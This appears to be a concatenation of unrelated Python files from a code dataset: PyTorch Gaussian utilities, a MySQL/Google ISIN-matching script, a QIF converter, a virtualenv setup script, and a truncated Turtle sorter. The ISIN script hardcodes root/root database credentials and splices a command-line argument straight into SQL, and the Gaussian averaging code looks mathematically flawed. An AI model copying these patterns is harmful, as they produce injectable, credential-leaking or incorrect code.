def _combine(fcn, *argv, dim):
mu, log_sigma = [], []
for g in argv:
mu.append(g.mu)
log_sigma.append(g.log_sigma)
mu = fcn(mu, dim)
log_sigma = fcn(log_sigma, dim)
return Gaussian(mu, log_sigma)
def average(self, dists):
"""Fits single Gaussian to a list of Gaussians."""
mu_avg = torch.stack([d.mu for d in dists]).sum(0) / len(dists)
sigma_avg = torch.stack([d.mu ** 2 + d.sigma ** 2 for d in dists]).sum(0) - mu_avg**2
return type(self)(mu_avg, torch.log(sigma_avg))
def chunk(self, *args, **kwargs):
return [type(self)(chunk) for chunk in torch.chunk(self.tensor(), *args, **kwargs)]
def view(self, shape):
self.mu = self.mu.view(shape)
self.log_sigma = self.log_sigma.view(shape)
self._sigma = self.sigma.view(shape)
return self
def __getitem__(self, item):
return Gaussian(self.mu[item], self.log_sigma[item])
def tensor(self):
return torch.cat([self.mu, self.log_sigma], dim=-1)
def rsample(self):
"""Identical to self.sample(), to conform with pytorch naming scheme."""
return self.sample()
def detach(self):
"""Detaches internal variables. Returns detached Gaussian."""
return type(self)(self.mu.detach(), self.log_sigma.detach())
def to_numpy(self):
"""Convert internal variables to numpy arrays."""
return type(self)(ten2ar(self.mu), ten2ar(self.log_sigma))
class UnitGaussian(Gaussian):
def __init__(self, size, device):
mu = torch.zeros(size, device=device)
log_sigma = torch.zeros(size, device=device)
super().__init__(mu, log_sigma)
class MultivariateGaussian(Gaussian):
def log_prob(self, val):
return super().log_prob(val).sum(-1)
@staticmethod
def stack(*argv, dim):
return MultivariateGaussian(Gaussian.stack(*argv, dim=dim).tensor())
@staticmethod
def cat(*argv, dim):
return MultivariateGaussian(Gaussian.cat(*argv, dim=dim).tensor())
class MultivariateDiagNormal(MultivariateNormal):
def __init__(self, loc, scale, *args, **kwargs):
cov = torch.diag_embed(scale.pow(2))
super().__init__(loc, cov, *args, **kwargs)
class SequentialGaussian_SharedPQ:
""" stacks two Gaussians """
def __init__(self, g1, z1, g2):
"""
"""
self.g1 = g1
self.g2 = g2
self.z1 = z1
assert z1.shape == g1.shape
self.shared_dims = None # how many shape dimensions are shared
self._update_shared_dims()
def sample(self):
"""
        sample z2 and concatenate it with z1
:return:
"""
return torch.cat([self.z1, self.g2.sample()], dim=1)
def kl_divergence(self, other):
return self.g1.kl_divergence(other.g1)
@property
def shape(self):
self._update_shared_dims()
return self.g1.shape[:self.shared_dims]
@property
def mu(self):
return self.g1.mu
@staticmethod
def stack(*argv, dim):
return SequentialGaussian_SharedPQ._combine(torch.stack, *argv, dim=dim)
@staticmethod
def cat(*argv, dim):
return SequentialGaussian_SharedPQ._combine(torch.cat, *argv, dim=dim)
@staticmethod
def _combine(fcn, *argv, dim):
def fn_apply(inputs):
mu, log_sigma = [], []
for g in inputs:
mu.append(g.mu)
log_sigma.append(g.log_sigma)
mu = fcn(mu, dim)
log_sigma = fcn(log_sigma, dim)
return Gaussian(mu, log_sigma)
g1_list = [a.g1 for a in argv]
g2_list = [a.g2 for a in argv]
z1_list = [a.z1 for a in argv]
return SequentialGaussian_SharedPQ(fn_apply(g1_list), fcn(z1_list, dim=dim), fn_apply(g2_list))
def view(self, shape):
# assume that this shape does not include the last dimensions
self._update_shared_dims()
self.g1 = self.g1.view(shape + list(self.g1.shape[self.shared_dims:]))
self.g2 = self.g2.view(shape + list(self.g2.shape[self.shared_dims:]))
self.z1 = self.z1.view(shape + list(self.z1.shape[self.shared_dims:]))
return self
def __getitem__(self, item):
return SequentialGaussian_SharedPQ(self.g1[item], self.z1[item], self.g2[item])
def _update_shared_dims(self):
shared_dims = 0
for i, j in zip(self.g1.shape, self.g2.shape):
if i != j: break
shared_dims += 1
        assert shared_dims != 0  # need at least one shared dim between the Gaussians
self.shared_dims = shared_dims
class ProbabilisticModel:
def __init__(self):
self._sample_prior = False
def switch_to_prior(self):
self._sample_prior = True
def switch_to_inference(self):
self._sample_prior = False
def get_fixed_prior(tensor, bs=None, dim=None):
if dim is not None:
return Gaussian(tensor.new_zeros(bs, dim, 1, 1), tensor.new_zeros(bs, dim, 1, 1))
else:
return Gaussian(torch.zeros_like(tensor.mu), torch.zeros_like(tensor.log_sigma))
def stack(inp, dim):
if isinstance(inp[0], Gaussian):
return Gaussian.stack(*inp, dim=dim)
else:
return torch.stack(inp, dim)
def mc_kl_divergence(p, q, n_samples=1):
"""Computes monte-carlo estimate of KL divergence. n_samples: how many samples are used for the estimate."""
samples = [p.sample() for _ in range(n_samples)]
return torch.stack([p.log_prob(x) - q.log_prob(x) for x in samples], dim=1).mean(dim=1)
if __name__ == "__main__":
d = [Gaussian(torch.tensor([1., 1]), torch.zeros(2)), Gaussian(torch.tensor([-1., -1]), torch.zeros(2))]
    d_avg = d[0].average(d)  # average is an instance method, so call it on one of the Gaussians
print(d_avg.mu, d_avg.sigma)
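    # Hedged extra check (not in the original file): the Monte-Carlo KL
    # estimate should be close to the analytic per-dimension KL (0.5 here).
    p = Gaussian(torch.zeros(1, 2), torch.zeros(1, 2))
    q = Gaussian(torch.ones(1, 2), torch.zeros(1, 2))
    print(mc_kl_divergence(p, q, n_samples=1000).mean(), p.kl_divergence(q).mean())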
|
python
|
#-*- coding: utf-8 -*-
""" Use name to identify share isin by using fondout db and google """
"""
1. Lista pa okända shares vi vill söka isin på.
2. Traversera lista.
3. Kontrollera mot shares
4. Kontrollera mot share_company
5. Kontrollera mot shares LIKE från båda håll min chars 5
6. Kontrollera mot shares_company LIKE från båda håll min chars 5
7. Googla namn + isin.
Jämför google resultat med det vi ev. hittat i databasen.
Om vi väljer google res. på konflikt söker vi baklänges och ser om det
resultatet finns i databasen.
Olika resultatskoder skrivs ut i databasen.
TODO:
- Bryta ut parametrar för gränsvärden i variabler
- Bryt ut lösenord och användarnamn till ENV_VAR
"""
import sys
import mysql.connector
from isingoogle import GoogleIsinSearch
import argparse
import time
from random import randint
import signal
class FindIsin:
def exit_procedure(self):
print "Exiting script..."
self.cnxUp.commit()
self.cursorUp.close()
self.cnxUp.close()
self.cursor.close()
self.connection.close()
sys.exit(0)
def signal_handler(self, signal, frame):
print('You pressed Ctrl+C!')
self.exit_procedure()
def _execute_share_search_query(self, query, name):
cursor = self.connection.cursor(buffered=True)
try:
cursor.execute(query, (name, ))
except mysql.connector.errors.IntegrityError, e:
print ('Find share by name exception:', e)
if (cursor is not None):
self.share = cursor.fetchone()
else:
self.share = None
cursor.close()
return self.share
def _execute_share_search_query_get_all(self, query, name):
cursor = self.connection.cursor(buffered=True)
try:
cursor.execute(query, (name, ))
except mysql.connector.errors.IntegrityError, e:
print ('Find all shares exception:', e)
if (cursor is not None):
self.share = cursor.fetchall()
else:
self.share = None
cursor.close()
return self.share
def _find_by_share_exact_name(self, name):
query = ("SELECT s.name, s.isin FROM share s "
"WHERE s.name = (%s) "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_exact_alias(self, name):
query = ("SELECT sa.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE sa.name = (%s) "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_company_exact_name(self, name):
query = ("SELECT sc.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE sc.name = (%s) "
+ self.QUERY_WHERE_AND +
"GROUP BY sc.name "
+ self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_company_fuzzy_name(self, name):
query = ("SELECT sc.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE sc.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND +
"GROUP BY sc.name "
+ self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_fuzzy_name(self, name):
query = ("SELECT s.name, s.isin "
"FROM share s "
"WHERE s.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_reverse_fuzzy_name(self, name):
query = ("SELECT s.name, s.isin "
"FROM share s "
"WHERE %s like CONCAT('%', s.name, '%') "
"AND length(s.name) > 4 "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_fuzzy_alias(self, name):
query = ("SELECT sa.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE sa.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_reverse_fuzzy_alias(self, name):
query = ("SELECT sa.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE %s like CONCAT('%', sa.name, '%') "
"AND length(sa.name) > 4 "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_company_reverse_fuzzy_name(self, name):
query = ("SELECT s.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE %s like CONCAT('%', sc.name, '%') "
"AND length(s.name) > 4 "
+ self.QUERY_WHERE_AND +
"group by sc.name "
+ self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def share_by_isin(self, isin):
cursor = self.connection.cursor(buffered=True)
query = ("SELECT name FROM share s "
"WHERE isin = (%s) "
"AND (s.category = 1 or s.category is null) "
"LIMIT 1")
try:
cursor.execute(query, (isin, ))
except mysql.connector.errors.IntegrityError, e:
print ('Find share by isin exception:', e)
if (cursor is not None):
share_name = cursor.fetchone()
else:
share_name = None
cursor.close()
return share_name
def share_company_by_isin(self, isin):
cursor = self.connection.cursor(buffered=True)
query = ("SELECT sc.name FROM share s "
"join share_company sc on s.share_company = sc.id "
"WHERE isin = %s ")
try:
cursor.execute(query, (isin, ))
except mysql.connector.errors.IntegrityError, e:
print ('Find share_company by isin exception:', e)
if (cursor is not None):
self.share_company_name = cursor.fetchone()
else:
self.share_company_name = None
cursor.close()
if (self.share_company_name is not None):
self.share_company_name = self.share_company_name[0]
return self.share_company_name
def find_exact_share_routine(self, name):
self.share = None
self.share = self._find_by_share_exact_name(name)
if (self.share is None):
self.share = self._find_by_share_exact_alias(name)
if (self.share is None):
self.share = self._find_by_share_company_exact_name(name)
return self.share
def find_share_routine(self, name):
self.share = None
self.share = self.find_exact_share_routine(name)
# Do not allow fuzzy search on search strings shorter than four letters!
if (len(name) > 3):
if (self.share is None):
self.share = self._find_by_share_fuzzy_name(name)
if (self.share is None):
self.share = self._find_by_share_company_fuzzy_name(name)
if (self.share is None):
self.share = self._find_by_share_fuzzy_alias(name)
if (self.share is None):
self.share = self._find_by_share_reverse_fuzzy_alias(name)
if (self.share is None):
self.share = self._find_by_share_reverse_fuzzy_name(name)
if (self.share is None):
self.share = self._find_by_share_company_reverse_fuzzy_name(
name)
return self.share
def exact_and_fuzzy_routine(self, name):
share = None
share = self.find_exact_share_routine(name)
if(share is None):
share = self.find_share_routine(name)
return share
def all_exact(self, name):
shares = []
for query in self._exact_queries:
shares = shares + self._execute_share_search_query_get_all(query, name)
return shares
def all_fuzzy(self, name):
shares = []
for query in self._fuzzy_queries:
shares = shares + self._execute_share_search_query_get_all(query, name)
return shares
def find_share_alt_name(self, name):
name = name.lower()
share = None
used_names = []
used_names.append(name)
for suffix in self.company_suffix:
new_name = name.replace(suffix, "")
if (new_name not in used_names):
share = self.exact_and_fuzzy_routine(new_name)
used_names.append(new_name)
if (share is None):
new_name = new_name.replace(",", "").replace(".", "")
if (new_name not in used_names):
share = self.exact_and_fuzzy_routine(new_name)
used_names.append(new_name)
if (share is None):
new_name = new_name.replace(" ", "")
if (new_name not in used_names):
share = self.exact_and_fuzzy_routine(new_name)
used_names.append(new_name)
if (share is not None):
break
return share
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
def __init__(self):
self.QUERY_WHERE_AND = ( "AND s.isin IS NOT NULL "
"AND (s.category = 1 or s.category is null) ")
self.QUERY_ORDER = "ORDER BY s.category desc, s.id asc "
        self.company_suffix = [' group', '.', ',', ' corporation', ' group', ' plc',
                               ' limited', ' & co.',
                               ' ab', ' a/s', ' oyj', ' asa', ' hf', ' abp',
                               ' incorporated', ' company', ' & company',
                               ' ag', ' (the)', ' and company', ' holdings',
                               ' financial', 'the ', ' corp', ' inc', ' hldgs',
                               ' companies', ' nl', ' se', 's.p.a.', ' spa', 's.a.',
                               'aktiengesellschaft', ', inc.', ' co. ltd.', 'ltd', 'plc',
                               'company limited']
self.QUERY_LIMIT = ""
self._find_by_share_exact_name_query = ("SELECT s.name, s.isin FROM share s "
"WHERE s.name = (%s) "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_exact_alias_query = ("SELECT s.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE sa.name = (%s) "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_company_exact_name_query = ("SELECT s.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE sc.name = (%s) "
+ self.QUERY_WHERE_AND +
"GROUP BY sc.name "
+ self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_company_fuzzy_name_query = ("SELECT s.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE sc.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND +
"GROUP BY sc.name "
+ self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_fuzzy_name_query = ("SELECT s.name, s.isin "
"FROM share s "
"WHERE s.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_reverse_fuzzy_name_query = ("SELECT s.name, s.isin "
"FROM share s "
"WHERE %s like CONCAT('%', s.name, '%') "
"AND length(s.name) > 4 "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_fuzzy_alias_query = ("SELECT s.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE sa.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_reverse_fuzzy_alias_query = ("SELECT s.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE %s like CONCAT('%', sa.name, '%') "
"AND length(sa.name) > 4 "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_company_reverse_fuzzy_name_query = ("SELECT s.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE %s like CONCAT('%', sc.name, '%') "
"AND length(s.name) > 4 "
+ self.QUERY_WHERE_AND +
"group by sc.name "
+ self.QUERY_ORDER + self.QUERY_LIMIT)
self._exact_queries = (
self._find_by_share_exact_name_query,
self._find_by_share_exact_alias_query)
# not including SC in exact match.
#self._find_by_share_company_exact_name_query
self._fuzzy_queries = (
self._find_by_share_company_exact_name_query,
self._find_by_share_company_fuzzy_name_query,
self._find_by_share_fuzzy_name_query,
self._find_by_share_reverse_fuzzy_name_query,
self._find_by_share_fuzzy_alias_query,
self._find_by_share_reverse_fuzzy_alias_query,
self._find_by_share_company_reverse_fuzzy_name_query)
# Search database
self.connection = mysql.connector.connect(user='root',
password='root',
database='fondout_maxi')
self.cursor = self.connection.cursor()
# Update database
self.cnxUp = mysql.connector.connect(
user='root',
password='root',
database='fund_search')
self.cursorUp = self.cnxUp.cursor()
self._isin_google = GoogleIsinSearch()
def main(self):
# Parse args from command line
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--fund", help="Fund to use.")
args = parser.parse_args()
# Prepare script to listen to ctrl-c
signal.signal(signal.SIGINT, self.signal_handler)
# --------- Choose selection of shares from database
query_unidentified_shares = (
"SELECT name from tmp_shareholding "
"where isin IS NULL")
# uncomment to enable Test list already caught share-isins / redo everything
if args.fund is not None:
print "Fund used : ", args.fund
query_unidentified_shares = (
"SELECT name from tmp_shareholding "
"where fund = (select id from tmp_fund where name LIKE '%"
+ args.fund + "%')"
" AND isin IS NULL and false_positive = 0")
self.cursorUp.execute(query_unidentified_shares)
unidentifiedShares = self.cursorUp.fetchall()
# --------------------------------------------------------------------------
for (share_name,) in unidentifiedShares:
# lowercase because MYSQL is not case sensitive, but python is.
share_name = share_name.lower()
print "New share: ", share_name
# --------------- Find section ---------------
# First db-search attempt, exact match
found_share = self.find_exact_share_routine(share_name)
if (found_share is not None):
exact_match = True
else:
exact_match = False
# Second db-search attempt, fuzzy search
if (found_share is None):
found_share = self.find_share_routine(share_name)
# Third db-search attempt with alternated name
if (found_share is None):
used_names = []
used_names.append(share_name)
for suffix in self.company_suffix:
new_name = share_name.replace(suffix, "")
if (new_name not in used_names):
found_share = self.find_share_routine(new_name)
used_names.append(new_name)
if (found_share is None):
new_name = new_name.replace(",", "").replace(".", "")
if (new_name not in used_names):
found_share = self.find_share_routine(new_name)
used_names.append(new_name)
if (found_share is None):
new_name = new_name.replace(" ", "")
if (new_name not in used_names):
found_share = self.find_share_routine(new_name)
used_names.append(new_name)
if (found_share is not None):
break
if (exact_match is not True):
(googled_isin,
googled_isin_matches,
google_occurances) = self._isin_google.search_google(share_name)
else:
googled_isin_matches = 0
google_occurances = None
googled_isin = None
if (found_share is not None):
(found_name, found_isin) = found_share
print found_name, found_isin
if (googled_isin_matches > 0):
if (found_isin == googled_isin):
# CASE 1: GOOGLE = DBMATCH --> SAME ISIN
# Database found matches top google result
print 'Found isin matches googled isin, gr8 success!'
found_method = ("1: search and google match. Google hits: "
+ str(googled_isin_matches))
elif (googled_isin_matches > 3):
# CASE 2: GOOGLE(>3) != DBMATCH --> CHOOSE GOOGLE
# No match google hits wins - take google result
found_method = ("2:" + str(googled_isin_matches)
+ " google hits, conflict search " + found_name + " "
+ found_isin)
found_isin = googled_isin
found_name = "googled: "
result = self.share_by_isin(googled_isin)
if (result is not None):
found_name = found_name + ' ' + result[0]
elif (googled_isin_matches > 0):
if (found_isin in google_occurances):
# CASE 3: GOOGLE(<3) != DBMATCH, DBMATCH in GOOG OCCURANC
# ---> CHOOSE DBMATCH
found_method = ("3: mismatch db. top google hit: "
+ googled_isin + ":" + str(googled_isin_matches))
else:
# CASE 4: GOOGLE(<4) != DBMATCH, DBMATCH NOT in GOOG OCCURANC
# found_isin = ""
# found_name = ""
found_method = ("4. mismatch db google("
+ str(googled_isin_matches) + ") not in google results. "
+ googled_isin)
result = self.share_by_isin(googled_isin)
if (result is not None):
found_method = (found_method + ' db-matched to ' +
result[0])
elif (exact_match is True):
# CASE 8: EXACT MATCH
found_method = "8: Exact match"
else:
# CASE 2: No google hits, but found in DB
# Make this a separate case?
found_method = "2: No google hits"
elif (googled_isin_matches > 0):
# min 3 google hits makes certain
if (googled_isin_matches > 2):
found_isin = googled_isin
# Search current db for found isin.
result = self.share_by_isin(googled_isin)
found_method = ("5:" + str(googled_isin_matches)
+ " results googled, faild db-search.")
found_name = "googled: "
if (result is not None):
found_name = found_name + result[0]
else:
found_method = ("6. Google hits: " + str(googled_isin_matches)
+ " : " + googled_isin)
result = self.share_by_isin(googled_isin)
if (result is not None):
found_method = found_method + ' db-matched to ' + result[0]
found_isin = ""
found_name = ""
else:
found_isin = ""
found_name = ""
found_method = "7: Nothing found!"
# Get share_company
found_share_company = ""
if(found_isin != ""):
found_share_company = self.share_company_by_isin(found_isin)
# --------------- Update section ---------------
query_update_isin = (
"UPDATE tmp_shareholding "
"SET matched_name=%s, isin=%s, method_found=%s, share_company=%s "
"WHERE name = %s")
update_share_values = (found_name, found_isin, found_method,
found_share_company, share_name)
            # If a fund is specified, also filter the update by that fund.
            # Note: this should really be the exact fund name pulled from the database.
if args.fund is not None:
query_update_isin = (
query_update_isin +
" and fund = (select id from tmp_fund "
"where name like CONCAT('%', %s, '%'))")
update_share_values = update_share_values + (args.fund, )
# Update share in fund_search where name = share_name
try:
self.cursorUp.execute(query_update_isin, update_share_values)
except Exception as e:
print('Update execution error', e)
# Use commit for confirming modification of data.
# Rollback to undo.
# Disable for test.
self.cnxUp.commit()
time.sleep(randint(0,10))
self.exit_procedure()
if __name__ == "__main__":
findIsin = FindIsin()
findIsin.main()
|
python
|
"""Provides conversion for transaction data into an exchange format."""
import textwrap
import time
from powl import exception
class TransactionConverter(object):
"""
Provides methods to convert data into a financial exchange format.
"""
def convert(self, date, debit, credit, amount, memo):
"""
Convert a transaction into an exchange financial format.
Parameters
----------
date : time.struct_time
Date of the transaction.
debit : str
Debit account of the transaction.
credit : str
Credit account of the transaction.
amount : float
Amount of the transaction.
memo : str
Description of the transaction.
"""
pass
class QifConverter(TransactionConverter):
"""
Provides methods to convert a transaction into QIF format.
"""
def __init__(self, log, files, account_types, assets, liabilities,
revenues, expenses):
"""
Parameters
----------
log : powl.log.Log
Used to log.
files : dict of powl.filesystem.File
Map of account key to files. Every key in files must exist in
either of assets, liabilities, revenues, or expenses.
account_types : dict
Map of account key to QIF account types.
assets : dict
Map of account key to Assets.
liabilities : dict
            Map of account key to Liabilities.
        revenues : dict
            Map of account key to Revenues.
        expenses : dict
            Map of account key to Expenses.
Notes
-----
An account key is a string that maps to a QIF account.
Multiple account key words can map to the same account.
For example "ent" can map to "Expenses:Entertainment" and
"entertainment" can also map to "Expenses:Entertainment".
Raises
------
ValueError
            If a key in files does not have a matching key in any of assets,
            liabilities, revenues, or expenses.
"""
self._log = log
self._files = files
self._account_types = account_types
self._assets = assets
self._liabilities = liabilities
self._revenues = revenues
self._expenses = expenses
self._accounts = dict(self._assets.items() +
self._liabilities.items() +
self._revenues.items() +
self._expenses.items())
for key, value in self._files.items():
if key not in self._accounts.keys():
msg = ("account key ({0}) ".format(key) +
"for file ({0}) ".format(value.filename) +
"does not have has an associated QIF account")
err = exception.create(ValueError, msg)
raise err
def convert(self, date, debit, credit, amount, memo):
"""
Convert transaction data into QIF format.
Parameters
----------
date : time.struct_time
Date of the transaction.
debit : str
Debit account of the transaction.
credit : str
Credit account of the transaction.
amount : float
Amount of the transaction.
memo : str
Description of the transaction.
Returns
-------
record : str
QIF record of the transaction.
qif_file : powl.filesystem.File
The QIF file to output to.
Notes
-----
        Since it depends on which QIF file records the transaction, the return
        value also contains the file to write to.
"""
qif_date = self._format_date(date)
qif_transfer = self._get_transfer_account(debit, credit)
qif_amount = self._format_amount(debit, amount)
qif_memo = memo
qif_record = self._format_qif_record(qif_date, qif_transfer,
qif_amount, qif_memo)
qif_file = self._get_qif_file(debit, credit)
self._log_transaction(qif_date, qif_file.filename, qif_transfer,
qif_amount, qif_memo)
return qif_record, qif_file
def _create_qif_templates(self):
templates = []
for key, filename in self.filenames.iteritems():
account_name = self.accounts.get(key)
account_type = self.types.get(key)
header = self._format_qif_header(account_name, account_type)
template = (filename, header)
templates.append(template)
return templates
def _format_amount(self, debit, amount):
"""
Convert amount to QIF format based on debit.
Parameters
----------
debit : str
Account key for the debit of a transaction.
amount : str or float
Amount of the transaction.
Returns
-------
str
Formatted amount to use in QIF file.
Raises
------
ValueError
If amount cannot be converted to a float.
KeyError
If debit key is not an account.
"""
try:
formatted_amount = "{0:.2f}".format(float(amount))
except ValueError as err:
msg = "amount ({0}) cannot be converted to float".format(amount)
exception.add_message(err, msg)
raise
if debit in self._expenses:
# Amount should be negative.
return '-' + formatted_amount
elif debit in self._accounts:
return formatted_amount
else:
msg ="account key ({0}) does not exist".format(debit)
err = exception.create(KeyError, msg)
raise err
def _format_date(self, date):
"""
Convert struct_time to QIF date format (MM/DD/YYYY).
Parameters
----------
date : time.struct_time
The date of the transaction.
Returns
-------
str
String date in the format of "MM/DD/YYYY".
Raises
------
TypeError
If date is not a struct_time.
ValueError
If a date value is out of range.
OverflowError
If a value in the tuple is too large to be stored in a C long.
"""
try:
return time.strftime("%m/%d/%Y", date)
except (ValueError, TypeError, OverflowError) as err:
msg = ("date ({0}) cannot be converted ".format(date) +
"to MM/DD/YYYY ")
exception.add_message(err, msg)
raise
def _format_qif_header(self, account_name, account_type):
"""Format an account name and type into a header for a QIF file."""
data = { 'name': account_name, 'type': account_type }
header = textwrap.dedent("""\
!Account
N{name}
T{type}
^
!Type:{type}""".format(**data))
return header
def _format_qif_record(self, date, transfer, amount, memo):
"""
Formats qif data into a transaction for a QIF file.
Parameters
----------
date : str
Date of the transaction
transfer : str
Transfer QIF account.
amount : str
Formatted amount.
memo : str
Description of the transaction.
"""
return textwrap.dedent(
"""\
D{0}
T{1}
L{2}
M{3}
^""".format(date, amount, transfer, memo))
def _get_qif_file(self, debit, credit):
"""
Get the associated QIF file from the debit and credit keys.
Parameters
----------
debit : str
Account key for the debit of a transaction.
credit : str
Account key for the credit of a transaction.
Raises
------
KeyError
If neither key has an associated QIF file.
Notes
-----
        Debit key has priority, so if both the debit and credit keys have an
        associated QIF file, then the QIF file associated with the debit
        key is returned.
This is linked with get_transfer_account. If the QIF file returned
from this is from the debit key then the transfer account must be
from the credit key and vice versa.
"""
if debit in self._files:
return self._files[debit]
elif credit in self._files:
return self._files[credit]
else:
msg = ("neither debit key ({0}) ".format(debit) +
"or credit key ({0}) ".format(credit) +
"has an associated QIF file")
err = exception.create(KeyError, msg)
raise err
def _get_transfer_account(self, debit, credit):
"""
Get the associated QIF account from the debit and credit keys.
Parameters
----------
debit : str
Account key for the debit of a transaction.
credit : str
Account key for the credit of a transaction.
Raises
------
KeyError
If neither key has an associated QIF file.
If neither key has an associated QIF account.
Notes
-----
        Credit key has priority, so if both the debit and credit keys have an
        associated QIF account, then the QIF account associated with the
        credit key is returned.
This is linked with get_qif_file. If the transfer account returned
from this is from the credit key then the QIF file must be from the
debit key and vice versa.
"""
if debit in self._files:
key = credit
elif credit in self._files:
key = debit
else:
msg = ("neither debit key ({0}) ".format(debit) +
"or credit key ({0}) ".format(credit) +
"has an associated QIF file")
err = exception.create(KeyError, msg)
raise err
if key in self._accounts:
return self._accounts[key]
else:
msg = ("account key ({0}) ".format(key) +
"does not have has an associated QIF account")
err = exception.create(KeyError, msg)
raise err
def _log_transaction(self, date, filename, transfer, amount, memo):
"""
Debug logs the transaction.
Parameters
----------
date : str
Date of the transaction
filename : str
Name of the QIF file.
transfer : str
Transfer QIF account.
amount : str
Formatted amount.
memo : str
Description of the transaction.
"""
self._log.debug("QIF transaction:")
self._log.debug(" date: %s", date)
self._log.debug(" file: %s", filename)
self._log.debug(" transfer: %s", transfer)
self._log.debug(" amount: %s", amount)
self._log.debug(" memo: %s", memo)
|
python
|
#!/usr/bin/env python
# pylint: disable=wrong-import-position
import os
import subprocess
import sys
import tempfile
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
from xv_leak_tools.helpers import current_os
if len(sys.argv) != 2:
sys.stderr.write("USAGE: setup_python.py virtualenv_location\n")
sys.exit(1)
def bin_path():
if current_os() == 'macos':
return '/usr/local/bin/'
return '/usr/bin/'
def install_python_if_not_present(location):
if os.path.exists(os.path.join(location, 'bin', 'activate')):
print("Virtualenv already setup in {}".format(location))
return
print("Creating virtualenv")
cmd = [
os.path.join(bin_path(), 'virtualenv'),
'-p',
os.path.join(bin_path(), 'python3'),
location
]
print("Executing: {}".format(" ".join(cmd)))
subprocess.check_output(cmd)
write_pythonlocation(location)
def install_pip_packages():
if sys.platform == 'linux' or sys.platform == 'linux2':
requirements = 'requirements_linux.txt'
elif sys.platform == 'darwin':
requirements = 'requirements_macos.txt'
elif sys.platform == 'cygwin':
requirements = 'requirements_windows.txt'
else:
raise Exception("Unsupported system: {}".format(sys.platform))
print("Installing pip packages using {}".format(requirements))
script = '''\
source activate
pip3 install -r {}
'''.format(requirements)
_file, script_file = tempfile.mkstemp()
with os.fdopen(_file, 'w') as _file:
_file.write(script)
print("Wrote temp file to {}".format(script_file))
try:
for line in subprocess.check_output(['bash', script_file]).splitlines():
print(line.decode())
except subprocess.CalledProcessError as ex:
print("FAILED: {}".format(ex))
sys.exit(1)
def write_pythonlocation(location):
with open('.pythonlocation', 'w') as _file:
_file.write(location)
LOCATION = sys.argv[1]
print("Setting up python in {}".format(LOCATION))
install_python_if_not_present(LOCATION)
# Write the python location first as the pip step relies on it
write_pythonlocation(LOCATION)
# We always install pip packages so that updates from the repo get picked up. On the build machines
# this is very useful. It's cheap to pip install if everything is already installed.
install_pip_packages()
|
python
|
from otd.skosnavigate import SKOSNavigate
from similarity.csv_parse import get_fragment
from utils.graph import create_bound_graph
def sort_turtle(prefix, identifiers, file_in, file_out):
with open(file_in, encoding='utf8') as fd:
line_iter = iter(fd)
entities = dict()
preamble_finished = False
preamble = []
while not preamble_finished:
line = next(line_iter)
preamble.append(line)
if line.strip() == "":
preamble_finished = True
extra = []
try:
while True:
line = next(line_iter)
                if line.strip() == "":
# Extra blank lines between entities
continue
if not line.startswith(prefix):
# We don't recognize this, just put it in the end
extra.append(line)
continue
# If we are here, then we recognize this line as the first for a
# subject. Its identifier is from after the prefix, until space.
this_id = line.split()[0][len(prefix):]
this_entitity = []
entities[this_id] = this_entitity
# do-while loop
this_entitity.append(line)
while line.strip() != "":
line = next(line_iter)
this_entitity.append(line)
except StopIteration:
# End of file
pass
# Add to file in order given by identifiers
sorted_lines = list()
sorted_lines.extend(preamble)
for ent_id in identifiers:
if ent_id in entities:
sorted_lines.extend(entities[ent_id])
entities.pop(ent_id)
else:
print('Identifier', ent_id, 'not found in turtle file')
remaining_entities = sorted(entities.items())
for _, lines in remaining_entities:
